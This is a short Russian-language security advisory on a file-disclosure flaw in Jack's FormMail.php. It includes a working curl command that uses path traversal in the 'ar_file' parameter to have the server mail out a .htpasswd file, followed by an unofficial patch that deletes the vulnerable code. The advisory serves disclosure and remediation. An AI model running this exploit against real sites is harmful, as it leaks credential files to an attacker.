Просмотр произвольных файлов в Jack's FormMail.php

Описание:
Обнаружена уязвимость в Jack's FormMail.php. Удаленный пользователь может просмотреть файлы на уязвимой системе.

Удаленный пользователь может определить значение для переменной автоматического ответа 'ar_file' и отправить по почте произвольный файл на уязвимой системе. Пример:

# curl -e http://yoursite.com/ -d ar_file=../members/.htpasswd -d
email=you@yoursite.com http://yoursite.com/cgi-bin/formmail.php

URL производителя: http://dtheatre.com/scripts/formmail.php

Решение: Решение не существует на данный момент.
Неофициальный патч:
Вы можете удалить следующие строки из сценария FormMail.php:

if (file_exists($ar_file)) {
$fd = fopen($ar_file, "rb");
$ar_message = fread($fd, filesize($ar_file));
fclose($fd);
mail_it($ar_message, ($ar_subject)?stripslashes($ar_subject):"RE:
Form Submission", ($ar_from)?$ar_from:$recipient, $email);
}